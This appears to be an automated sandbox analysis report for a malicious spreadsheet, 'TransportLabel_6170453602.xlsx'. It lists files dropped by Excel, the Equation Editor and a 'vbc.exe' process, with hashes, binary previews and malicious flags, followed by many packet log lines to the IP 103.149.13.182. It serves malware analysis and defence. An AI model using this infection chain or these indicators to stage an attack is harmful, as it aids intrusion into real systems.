                  Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):5396
                  Entropy (8bit):7.915293088075047
                  Encrypted:false
                  SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                  MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                  SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                  SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                  SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                  Malicious:false
                  Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):2647
                  Entropy (8bit):7.8900124483490135
                  Encrypted:false
                  SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                  MD5:E46357D82EBC866EEBDA98FA8F94B385
                  SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                  SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                  SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                  Malicious:false
                  Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):10202
                  Entropy (8bit):7.870143202588524
                  Encrypted:false
                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                  Malicious:false
                  Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):5396
                  Entropy (8bit):7.915293088075047
                  Encrypted:false
                  SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                  MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                  SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                  SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                  SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):11303
                  Entropy (8bit):7.909402464702408
                  Encrypted:false
                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):1099960
                  Entropy (8bit):2.0152800116954332
                  Encrypted:false
                  SSDEEP:3072:vXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:1ahIFdyiaT2qtXl
                  MD5:BD4C089D8210CF4FCF74013334B2B925
                  SHA1:1B98EDBC5386B92D82AC9B6174DEE1BC5411CC5E
                  SHA-256:BC1A75F99B79C98350DA4BB5561EAC01186DACF8D64F3AE8D4822E1A028644D9
                  SHA-512:5D7A6FB4798CC15FFDEF6F5282CD2A07034C4C8C92AFFF6199382F0FA72E9C8B46C625D3B0A7311AD5E3D1EBE27DBDD3E35166A758DC0DB8D974A722FB20B48C
                  Malicious:false
                  Process:C:\Users\Public\vbc.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):60648
                  Entropy (8bit):6.273540391388373
                  Encrypted:false
                  SSDEEP:768:VyIscWONgNnXigWuv3uuCRCF5AElVllzCix92FBo/SlOKsVjiVsRb2X9bhM:VDt5Ngg23TgNElDNeo/8OLjiOR6
                  MD5:00B917A158BB5BF0D6BFF7D6B3C81B12
                  SHA1:24A9B80C8EC794ADA4C8BAF717CFAB98459AC1DE
                  SHA-256:947BE059906893C09F222CB2868631638A219FB905A47E16A311BA5ADEB4B300
                  SHA-512:47B8EABDF404E19B2D953933D2D0C922CC538B3876D7664110CBD739605FFD151D24788E60B9935E6E4F7BB463F6BC7CED253CF31ED5C4D210495C301C7E5F45
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Joe Sandbox View:
                  • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious
                  Process:C:\Users\Public\vbc.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):36576
                  Entropy (8bit):6.18658407883376
                  Encrypted:false
                  SSDEEP:384:Vw33667/fhcAcwuVQydIDddeypaROhGkXMV3lBhjUK98krmRt8ZrqL1r8/lSNriq:q33oWsUK98vAqL1r8oFiQ7b2X9shHf
                  MD5:0B849C073801DCE25301ECA0146D534B
                  SHA1:5BB9251CA83FE96C8F52B35637E674A629ED1468
                  SHA-256:3F77E9EF8843DE3DA37037F21BCF6D7E990085D2BDC5B3F05E71AB5EBE5288BB
                  SHA-512:1C5C99BD93FBACD3BA56ADE806092AB86BA3FEA0BB70DE0FB89775285A71DB47F2400CF29757370CDC69F13FCBCF6513B25F4C8BBED0A15D65A9618BEE733A7F
                  Malicious:false
                  Joe Sandbox View:
                  • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious
                  • Filename: DWG-1579.exe, Detection: malicious
                  • Filename: RFQ-1579.exe, Detection: malicious
                  • Filename: DWG-1579.exe, Detection: malicious
                  • Filename: RFQ-1579.xlsx, Detection: malicious
                  Process:C:\Users\Public\vbc.exe
                  File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1070
                  Entropy (8bit):4.836891219007383
                  Encrypted:false
                  SSDEEP:24:JdtGOiNK+bIg4y3QdM/Ai8qTCNzgDQRnKVGaQkl:3U1K+bIg4y3QdaIzgDQh3aQkl
                  MD5:9B48061E7B9FC35CD2624F2B9102549E
                  SHA1:9DA640A8AF809549031916AB143026FAAF3B1E74
                  SHA-256:84839C6E85F9B73AA6B0F331A9EAADF7409B7B36E30BA0B04E31680069103E43
                  SHA-512:01CF7B5CBDEB1038E79076CB452AC63B0037C86570C3FE97B6C559823F43D515F34CAC963D3737B9EAF103F0EBDEBC1317B68091D4332C3615E87A3F25DF679E
                  Malicious:false
                  Preview:.<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" />.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="NeGACOM" type="win32" version="17.0.0.0" processorArchitecture="x86" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="OnlineServices" version="17.0.0
                  Process:C:\Users\Public\vbc.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):77432
                  Entropy (8bit):6.5191464617024995
                  Encrypted:false
                  SSDEEP:1536:0ryhqjc8wTqJ39FNvl4UXgmBfCotcEntclFVdwJZp:0ryTk3HdyYgmBfCscEilFVG
                  MD5:0CAED7F18389A6CC24391E0400C2BE47
                  SHA1:59288CED440D46970090F25983B409BB25F43BBF
                  SHA-256:E8C48296D444C8EDBF6169CA9E3C5334B0813BFC684C2E99BFD61C692A3784F1
                  SHA-512:AFC59C8EA01D5F96DFAB3CD08F088FF2136542C0F13435EE9D63795CD8BDEF6D746408296883CD9052BF21D6E87388295B4682F06913CC982B21868704277B93
                  Malicious:false
                  Process:C:\Users\Public\vbc.exe
                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):288
                  Entropy (8bit):7.002703251110111
                  Encrypted:false
                  SSDEEP:6:6v/lhPysDjYOGW78zHS1w9xuIGXdvkFRBp9rXHEb/GY1IX2NYKjp:6v/7jjYOGW7Rw9xu6pxHG/VIX6F
                  MD5:A83F8C904AFA9E3F6A50D263747CF6DF
                  SHA1:7B9D99B950518FCAF5AC59350823D2B20E82956F
                  SHA-256:F57C0B31EC836E26EB609F259CFA68DDA95F09685784423B61075DAE4BBA5BF6
                  SHA-512:4B2DC243E86514BDC816B92808C491EF71B72690F25C2372FE909CED3A103F990708C507065169FA5C6F823A8B1ADADB7BF13696E78C807A973789CF14CA3A06
                  Malicious:false
                  Process:C:\Users\Public\vbc.exe
                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):893
                  Entropy (8bit):7.712327619290152
                  Encrypted:false
                  SSDEEP:12:6v/7M/6CsI5hmePcdiB6BV3h8SkKc47zOTtcC8VErf6qdY94OR/vlNMgmaGe7fb:q65hBcs6L3h6hBcCLrDq42nMDanb
                  MD5:473EE416AF2C1AE05AA7D5D004C9B3D2
                  SHA1:EEC352E25F562C0386D5C92384A70B3005D40D6F
                  SHA-256:2C48F1719BBC825592FB0929E31DCFE66578665D28099087EA98EF261688DC18
                  SHA-512:2B05C9920CFDCF378448F35B14AA56078051584CA0DB15F43B5A27272B072DD8A76BBC2829DF4C7C7BAF8339839974A00CA7BFFB8425B7D9494421CCC9EE80C1
                  Malicious:false
                  Process:C:\Users\Public\vbc.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):12288
                  Entropy (8bit):5.814115788739565
                  Encrypted:false
                  SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                  MD5:CFF85C549D536F651D4FB8387F1976F2
                  SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                  SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                  SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                  Malicious:false
                  Process:C:\Users\Public\vbc.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):214568
                  Entropy (8bit):6.30310219025288
                  Encrypted:false
                  SSDEEP:3072:WSQvJRT4XDaGZcJRQqnKJNuC3d5C/I4ye9P7Vvw/YDQzix+AKp:WDRT4XDpZ0QqnKJNuCwx9PRCixK
                  MD5:6D01A897D44DD4D25D7E1264407210FD
                  SHA1:332C3ADE84D0C1E5BE298C037F9FE222620343B2
                  SHA-256:DD8289A21902F458B861C08A2F54D23F1E214B37BB89E73D4108303B490F7644
                  SHA-512:54098533FDC9B4BAB0CD525D652846B5CDCD808089346D0192D7CF9DE6C1E8E329E2071886391D729F3DFED59D2E860E8A811E07E6688E6AA0B55D5D98D1AD8D
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:CDFV2 Encrypted
                  Category:dropped
                  Size (bytes):188416
                  Entropy (8bit):7.956582645953576
                  Encrypted:false
                  SSDEEP:3072:TkPr1dg3M2he5DZQVVbexBYKeO7OwRa7lpe54UYE2QQh22tolXoubT7:pMH5GVVbUY77XQ4PE21VWn7
                  MD5:1DB66B406376F18434E1C02CBCF5C5E5
                  SHA1:35741CA39D0D76A00FAC1EAA720101D7BFD82CC5
                  SHA-256:A561EFADB6BAB1E3D4F5B0CDEFAECC0C4AFB382BFE3BDE81E1DAD0AEFC76695C
                  SHA-512:B2D4C212F7CFB8A6088E221D28C80ADCAEA2C07E5B400A8FACE28D2F918CA808E754F83CC36346011DA31F3EA1C60EF2284988E5F8AE769B99FDB6AEA4427106
                  Malicious:false
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                  MD5:797869BB881CFBCDAC2064F92B26E46F
                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                  Malicious:true
                  Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Category:dropped
                  Size (bytes):326847
                  Entropy (8bit):7.537994904334399
                  Encrypted:false
                  SSDEEP:6144:13yztyL/0/bbdat6J9mOnuuAgo+/sOxCHBs4YIwUrJrnBpKussJ9LQu:13pL0/bbdat6JIO1Ag2TBs4YI3BnB35N
                  MD5:D5E55A57372BCAD45FBB260105179CAF
                  SHA1:9B1935A927C072DD31017362FF1739BF1EA2AAF7
                  SHA-256:3C27C2AA1BC826FAA65AB4038EB385CABD6DB50108410E6F674D455AA1DC5532
                  SHA-512:088033564668A4FD3E107566387FECF0B6DCBD7A161C9EF3E4ADB232520467A64AF9EEC740FE783D5C62FA3B79BDD910E72F3ACC838E5FA155427C83003C407B
                  Malicious:true
                  File type:CDFV2 Encrypted
                  Entropy (8bit):7.956582645953576
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name:TransportLabel_6170453602.xlsx
                  File size:188416
                  MD5:1db66b406376f18434e1c02cbcf5c5e5
                  SHA1:35741ca39d0d76a00fac1eaa720101d7bfd82cc5
                  SHA256:a561efadb6bab1e3d4f5b0cdefaecc0c4afb382bfe3bde81e1dad0aefc76695c
                  SHA512:b2d4c212f7cfb8a6088e221d28c80adcaea2c07e5b400a8face28d2f918ca808e754f83cc36346011da31f3ea1c60ef2284988e5f8ae769b99fdb6aea4427106
                  SSDEEP:3072:TkPr1dg3M2he5DZQVVbexBYKeO7OwRa7lpe54UYE2QQh22tolXoubT7:pMH5GVVbUY77XQ4PE21VWn7
                  TLSH:E5040206BF29E682F0B551305E329F279A24FC13486CD9D81FB9FF942CB1495AA2D353
                  Icon Hash:e4e2aa8aa4b4bcb4
                  May 12, 2022 09:27:57.995807886 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:57.995815992 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:57.995834112 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:57.995857000 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:57.995872021 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:57.995882034 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:57.995886087 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:57.995904922 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:57.995912075 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:57.995928049 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:57.995938063 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:57.995951891 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:57.995956898 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:57.995976925 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:57.995989084 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:57.997986078 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.000597000 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.218966007 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.218995094 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219017982 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219041109 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219063044 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219084978 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219108105 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219130039 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219151020 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219173908 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219182014 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219194889 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219209909 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219214916 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219218016 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219222069 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219221115 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219225883 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219244957 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219266891 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219289064 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219289064 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219297886 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219310999 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219331980 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219352007 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219353914 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219367027 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219377995 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219399929 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219419956 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219419956 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219428062 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219443083 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219465971 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219485044 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219497919 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219520092 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219538927 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219546080 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219559908 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219559908 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219578981 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219582081 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219588995 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219603062 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219623089 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.219643116 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.219655991 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.220813990 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.220841885 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.220873117 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.220900059 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.223871946 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.442488909 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442523956 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442547083 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442570925 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442593098 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442616940 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442640066 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442662954 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442687035 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442708969 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442732096 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442754984 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442778111 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442800999 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442822933 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442821980 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.442841053 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442857981 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.442858934 CEST8049173103.149.13.182192.168.2.22
                  May 12, 2022 09:27:58.442863941 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.442867994 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.442871094 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.442873001 CEST4917380192.168.2.22103.149.13.182
                  May 12, 2022 09:27:58.442877054 CEST4917380192.168.2.22103.149.13.182
